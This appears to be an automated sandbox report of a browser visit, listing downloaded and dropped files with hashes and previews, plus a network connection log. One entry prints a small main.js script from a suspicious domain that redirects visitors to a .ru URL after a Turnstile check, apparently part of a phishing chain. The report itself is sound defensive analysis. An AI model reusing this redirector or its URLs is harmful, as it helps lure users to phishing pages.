                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 400 (Bad Request)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//ww
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (722)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):3492
                                                                                                                                                                                                                                  Entropy (8bit):5.367947722774756
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:oi+XGTzRus0QeUQqkFRcA5c9byU6UBzUw:J+2Tn94qkFRcVbyU62h
                                                                                                                                                                                                                                  MD5:0C28D5034535BF7E084E8575421231AE
                                                                                                                                                                                                                                  SHA1:66C2551829EE54B78CD0A45CE42F65E6E8E18EFB
                                                                                                                                                                                                                                  SHA-256:090E2488919925028778D36D3E7141BED740F5721EAFCEBC8573CA7EE0699CC3
                                                                                                                                                                                                                                  SHA-512:CD640E2A13B0FF53E55EA43F019CDAD2837CD905C07C86BEFA72351BCD7B4460B35D031C745FD539F74C03D2599CABA5B7B426D005A6A3AA0D70511733DC3BCC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.r1rg6QgmKXQ.es5.O/ck=boq-identity.AccountsSignInUi.LKDR6mlAzks.L.B1.O/am=iRnMZPgGABD_cBrQG1AkEDIAAAAAAAAAAGADAADIYQ/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,eVCnO,f8Gu1e,hc6Ubd,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,niKKCd,njlZCf,oLggrd,oqkvIf,p3hmRc,pxq3x,qPYxq,qmdT9,rmumx,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,ws9Tlc,xBaz7b,xQtZb,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlGArwG7Kxzg65_VsZCF0RXYsD32Uw/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=sOXFj,q0xTif,ZZ4WUe"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.Pg(_.Pqa);._.k("sOXFj");.var Wu=function(){_.Kt.call(this)};_.K(Wu,_.Ku);Wu.Ca=_.Ku.Ca;Wu.prototype.aa=function(a){return a()};_.Ou(_.Oqa,Wu);._.l();._.k("oGtAuc");._.Yya=new _.Df(_.Pqa);._.l();._.k("q0xTif");.var Tza=function(a){var b=function(d){_.To(d)&&(_.To(d).Mc=null,_.lv(d,null));d.XyHi9&&(d.XyHi9=null)};b(a);a=a.querySelectorAll("[c-wiz]");for(var c=0;c<a.length;c++)b(a[c])};_.wv=function(a,b){a&&_.Ff.hc().register(a,b)};_.xv=function(a){_.kv.call(this,a.La);var b=this,c=a.context.Zga;this.oa=c.Hr;this.kd=this.Pa=this.eb=this.Ba=null;this.Ma=a.Fa.Lc;this.Wa=a.Fa.lpa;a=this.oa.oa.then(function(d){b.Ba=d;d=b.oa.id.Z6(d,b.oa.getParams());b.eb=d.variant});c=c.a2.then(function(d){b.Pa=d});this.Ea=this.Ea.bind(this);this.hj(_.Ni([a,c]))};_.K(_.xv,_.kv);_.xv.Ca=function(){return{context:{Zga:"FVxLkf"},Fa:{Lc:_.Uu,component:_.qv,lpa:_.Yya}}};_.xv.prototype.aa=function(){ret
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1741x979, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):106290
                                                                                                                                                                                                                                  Entropy (8bit):7.99716969201618
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:3072:ibuyn9NZDLjSk2CB8bAsKDFN8+OUwNuuYWpq:y9NtjzKkpN8VLu+M
                                                                                                                                                                                                                                  MD5:428183BFB7C31D8C3BCC985DAC004681
                                                                                                                                                                                                                                  SHA1:691AE27C0FC2FE29732BD7C6907F4A9BE9253356
                                                                                                                                                                                                                                  SHA-256:B4F40DAF431A5CF056DFFF45E867C8C24D8107505CD46FF17B0F9102E4FE3D2B
                                                                                                                                                                                                                                  SHA-512:7E648B56988E9B66FCBE3DA447CEACFAC2A39D43D78604B50085CA3F64C898DDFD81F5C01F4A6854511BCC8845BABA7F8C4EC20974094F7F87AF27E4D1A78003
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF*...WEBPVP8 .....>...*....>.F.K...,..9A...in.f.Y....... j.........._.)|u.......=.?.....'M.W........c........t........7.'.o.?.{_..@?.z\z.~.{.. .C...W._........}@?..jt......?.?......../..<....._._....G...?........_........_._.................._........G.?.`.Q./..../.....o./.A......?.|.u/.?........s...?.............~.A.{.W....C.q.......?..`?....................y...........|..:.................k.....o..........u..................m.....{.....q..-..f.$M.. E........L'&..^...........<.y+.-.+..5.......b...FTM.c...............JMA...$...`+.x.]... ..7kc|..5....%.x.W{..&4......:.t....;.w@.....t..(.T)a6F........."......%\u...'D..........}..3....F.Lbh.g..g....-....3..%.W9....n.F~5R/5J..ql..~.F.B.LX.+...S.......+.0+c|...F........;.O..i.`..D.ez+uRj.I..9..e..q...;.u.c1.'itl...F....dx..pN......Y...|...&~>Q...o=.1`.)!.d.....A....~......8....Q.E.dj..V.`U...XUQ....o.}..pe%.-..H.....J.7........58.-.....".<..O._..N..;.i..b..1".I.}-...>......f.]...Ue....w.L._.z...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (358)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):11816
                                                                                                                                                                                                                                  Entropy (8bit):5.037139572888145
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:bpvXn2H25Zx48DNYGu6C9tdDOxktft1zQOPtaUrzvHlPuPQXGuV27BHplXtAUU/s:FvX2H25v4CYn6etFTBvhtv4IcpRtlU/s
                                                                                                                                                                                                                                  MD5:A8063BD37D3C8FB3176A6BF140558A4D
                                                                                                                                                                                                                                  SHA1:E32CF4B407DB3D3773DED13FF64B70FDBAD7735F
                                                                                                                                                                                                                                  SHA-256:BCCB23D41C2CC69CF0C7D22C4314CA8181A513C6999B73E45307792830F4E482
                                                                                                                                                                                                                                  SHA-512:82D749F6B17B21587FB345CA196A2AA83ECA80AD66ED9C1AB88B36709BED14175D53AFEFE9ACC0DAFC4FAD78FFB8DF155193A6829BC857AD6D68B1C84AF7B854
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://52kz793.afratradingagency.com/favicon.ico
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head profile="http://gmpg.org/xfn/11">. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>404 - PAGE NOT FOUND</title>...... Add Slide Outs -->.....<script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> .....<script src="/cgi-sys/js/simple-expand.min.js"></script>. . <style type="text/css">. body{padding:0;margin:0;font-family:helvetica;}. #container{margin:20px auto;width:868px;}. #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;}. #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;}. #container #mid404 #gatorbottom{position:relative;left:39px;float:left;}. #
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 21716, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):21716
                                                                                                                                                                                                                                  Entropy (8bit):7.988919175869214
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:DfspV407P6+jGlbMAA2cdv92Dg3AuGZ0KGKBb2ZXdWgb98JmSKMrN:D64Ei+n2c19NuqKuZXdWv79N
                                                                                                                                                                                                                                  MD5:D4FF90DB5DA894C833F356F47A16E408
                                                                                                                                                                                                                                  SHA1:30606044507D81B996C992895AB16B8A8D68BE97
                                                                                                                                                                                                                                  SHA-256:F2C761EE3CE27469F940A05B64E38A829A400427727CD0BDBB4E36F1D572AFD7
                                                                                                                                                                                                                                  SHA-512:85C6305EE6973EBF449EFCFC95BB10A66E5CBA92D026A2EC4F1072DC8CCBC5B4A4A384FE425E53E2DADE2180F37CCA56243ED354033CFCA5821CBB77FB8B0FA1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94YtzCwY.woff2
                                                                                                                                                                                                                                  Preview:wOF2......T........P..Tp..........................4..,..@.`..~..d..u.....<..4.....6.$.... ..V..X..^...'..:...m......?..ts..6(#k.y........ON....Mn..X..~X%A...T...q.r.L..9..B}#e....*}......{..l.I>.n....*.u.>v(..}lo.2.f..D.TG...:mc.3.M..A...../aJl..ZT.b.S.E}..wq.B...&...Y..s.o....Qs....>.]u^O....d..Y....oEfh.........u..X.....E.3c*....r...Eb.....N2+%\...J.6]N:.g[~..,..>@.`IXs........LP...c.!K.X[......A7Z....O..g....5..1...=..X....e!._.A..u.raef..y.....>li,/+..-.P-)...w.I..3\..s^.....T.\.1.;.x.:.r.7g...dK.$;....L2.t.i..hz.....>............5...,~}...W#..X.2...E,.Y.3..f.#........[..X......fDW.d...Y..8..T....^.{BC...+.W..9...`...\ ...c`.nc........_...}6A5eM.0r.IG...Km...l.'.o..py.~7.........P....9...hI.A'...D9.....4Q...9sc..9..........9lw.P...dI..z...S.>U.5.@Z...{.....=`R(...l.T.5...4{K....*.L..A.]...Rg.3......l..a......I.>...p.q.H.E=.$...Ps..LU..=.$......YU....#Fn..Q..c...B...4...B..3....?....ywJ.$.I..L....yK...m.!..b_g.eH.3,.5 .@.D.........)N.?.<yR......Ro
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):278417
                                                                                                                                                                                                                                  Entropy (8bit):5.579881439992781
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:Np8YnsmQ88PZ1HcRCriua0Mf3/9rf1uT+bQx5:f0m98P7Hc8ci5
                                                                                                                                                                                                                                  MD5:C0EE73C7AE451C7946EE899DD095D1BF
                                                                                                                                                                                                                                  SHA1:0CA55AD806DCF24A43BB7BED7277D5A5C1100098
                                                                                                                                                                                                                                  SHA-256:41C86FBD92E096D592074513081C47E1C9AA2756EDB645EAA4D700443D09F13E
                                                                                                                                                                                                                                  SHA-512:13F0FBB39AE1A3D7F90B74A94183F120B53F50D27BD267A997D242C453E82BB144385AEFA61E4CCF4D1E993A1C0D48094EDAD663D4C0AA770A643A8A16C17BCC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":6,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":111},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_fir
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 21552, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):21552
                                                                                                                                                                                                                                  Entropy (8bit):7.991124519925249
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:384:sPsBjS050+6ZPTO5MZcvt18lQYjxHe+YeXIY3r9mgNRb4PBvCrdYq+sMM:sPMjX0Gj8lQYFFEY3JmgTbcqYo
                                                                                                                                                                                                                                  MD5:EA2C3CF1BE388BD3FBE9D0CD8AFEE11C
                                                                                                                                                                                                                                  SHA1:6647CBAF7BFEDD842F806549F5C3433A19EAB1AB
                                                                                                                                                                                                                                  SHA-256:1CF04407E728EA1EBF82DC1C6B45D12632CB3202FF8F4556F380B16E57484F27
                                                                                                                                                                                                                                  SHA-512:2B260F63CD6BD0C75A3E6EE9EB5FA5B477F1AB2E107F682165C8A4BDCB9A6CFBFD21AB172CE165A3C2EBF451AB91D27070EF5E4D985EF3105EBCAE964C6D8870
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlL3Owp4.woff2
                                                                                                                                                                                                                                  Preview:wOF2......T0.......d..S..............................,..@.`..~..<..u.....X........6.$.... ..r..X....|.5......0...av .....p.........R...srCd..._o.,...A.4...w...{0.. ..A[.z...L."..j..&s..a.-O]........m......~l..yy..m.&.X.U0........G.|..t....l\.HVN......o....4M.{.j..I.Kb.D.....7.....<0Ln._k.........d[&y.C...8..7w.,.L.....u.n.!..q..H..i.{.P.fq......D8....G).....m.;e.K,0...Z...<.......=#.}...]o._..t....<..Em.}..,P..........I...3..Q.G..g"..~nZ..P..Jb./..?q..}.=..v......N...f...,.!.3.V......s.?..g..X..5W...B.:.....H.Rq.Iw*A...rq,..;v.\"(.n.~K.Z.Q0>..P.....a%).y.LE.{.8..&...V..h.jJc....u.\.9K.MI...g\..M..~.....n.a(......j..J{ .E....Vv..^....8.2U.....{.%..A....48.oiIG...r9....hg@...QU.z[..8'd(.s...BB....a9a.t...fh...=.y...P....l._...?;......b.d.X..bf.p..m..$.... E.{...W..:.....8V.R."./."]3.M...G.....RB.!......>..Y.'..M.n.+.rC.2../u...U..#.........D..8...4..G.!Ad..".#.w..P.:-`.."DC..BBI)....]..$.}..q.<p..As...^.y.c...(:.......Q.D#1./..W......R...=.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15436, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15436
                                                                                                                                                                                                                                  Entropy (8bit):7.986311903040136
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:uJ/qNyGt74AcZEG+69hFFHDJ1CggakKt0y:+q/kAc+ohFx9YgB2y
                                                                                                                                                                                                                                  MD5:037D830416495DEF72B7881024C14B7B
                                                                                                                                                                                                                                  SHA1:619389190B3CAFAFB5DB94113990350ACC8A0278
                                                                                                                                                                                                                                  SHA-256:1D5B7C64458F4AF91DCFEE0354BE47ADDE1F739B5ADED03A7AB6068A1BB6CA97
                                                                                                                                                                                                                                  SHA-512:C8D2808945A9BF2E6AD36C7749313467FF390F195448C326C4D4D7A4A635A11E2DDF4D0779BE2DB274F1D1D9D022B1F837294F1E12C9F87E3EAC8A95CFD8872F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
                                                                                                                                                                                                                                  Preview:wOF2......<L.......|..;..........................d..z..J.`..L.H..<........e..^...x.6.$..6. ..~. ..).7{...K.. .k~....".v(...[...RE.$..K..C,.'..{BK.C&.....'L!...DZ........+6.r...K..._...<..0..].V..........e.r(RN.43k;g`...?<?.......b..c.`.. .6..p...5.$zd.R%.........h....";.^WU.....H........S.j..M:..=K..\B.6"f......z.........$...%w.?$-....9.:u....u.I..Tt..s........lY...J.6oN..y...1,I.Yx..lu..}.e...Og..d...Xv.. ...iF.]..x.N..#%,y.&..,*$.^.n...\.K.P.J.x...H$..-.....p.....t.v...gD^....?..6o......e....,f.)..h...P...<.:.E...X..p....U.?.[m....l.Y.S..p..%..K.,U..3U.qFZo.*...U...3..3.]\.C.#..9T.8P`8......P...R;..r..J.*...u.j..^vnf.v.... .pw...Z.(.6%$U.[.|....!mU\}./..i,..7D........:t'.a;.W(.."G....q.-.Z......;J..0.&/.5. .T......w..;...t...H.t.<y ..@xx .JA.U.t..;g....@..... .t......<.5(^.|s..Ko.O.x.....!...........lHF............So{.%..V...7..aA$....C;,"(.J..EE..@.....vOB.,V..../....B#.r+./-t.(.N.S...R.Z$4...4i.c.}t...#3`.......s..;.O,.|..W.A.f.w.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):47692
                                                                                                                                                                                                                                  Entropy (8bit):5.4016459163756165
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                                                                                                                                  MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                                                                                                                  SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                                                                                                                  SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                                                                                                                  SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                                                                                                                                                  Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):320
                                                                                                                                                                                                                                  Entropy (8bit):4.908670547884398
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:HtW9lD+/98MPpC7T1Q2lvTHodNXpKpWgLZmUemmHl0WuEQwK59n:NWqeMsvLq87ZmHxHmrVR59n
                                                                                                                                                                                                                                  MD5:70978E56D82A2A66B672DCED84F2723A
                                                                                                                                                                                                                                  SHA1:7CF666780F42F97EF0A20D453F158AFB6612FA01
                                                                                                                                                                                                                                  SHA-256:E5191EEC3AC3CEE3567555742B9F94698485B87077E39FB637506E8CAC249F95
                                                                                                                                                                                                                                  SHA-512:25BF116C3932A9E6897A29708C9C4ACCB49816CB6906BF0F14D1284A514ECAC98CF39B785A27CD5BA269106628687FC95222CB68AA9BDB5591332070A422FF9D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://52kz793.afratradingagency.com/main.js
                                                                                                                                                                                                                                  Preview:window.onloadTurnstileCallback = function () {.. turnstile.render('#myWidget', {.. sitekey: '0x4AAAAAAA3CjQARFbjEVtU4',.. callback: function(token) {.. console.log('Challenge Success ${token}');.. window.location.href = "https://32.ergeane.ru/yNriUGk0/";.. },.. });.. };
                                                                                                                                                                                                                                  No static file info
                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:35.339351892 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:35.651526928 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:36.254375935 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:37.465410948 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:39.865381956 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.296144962 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.296195030 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.296389103 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.296739101 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.296783924 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.296838999 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.296989918 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.297003984 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.297207117 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.297228098 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:41.574630022 CET4968980192.168.2.16192.229.211.108
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.626437902 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.626773119 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.626801014 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.628092051 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.628160000 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.630331993 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.630404949 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.630659103 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.630665064 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.636264086 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.636534929 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.636584997 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.637610912 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.637690067 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.638649940 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.638724089 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.676424980 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.692390919 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.692415953 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:42.739370108 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.124144077 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.124228001 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.124284029 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.125093937 CET49705443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.125113964 CET44349705192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.137429953 CET49706443192.168.2.16192.185.195.214
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.183339119 CET44349706192.185.195.214192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.283843040 CET49708443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.283950090 CET44349708104.18.95.41192.168.2.16
                                                                                                                                                                                                                                  Dec 18, 2024 20:27:43.284181118 CET49708443192.168.2.16104.18.95.41
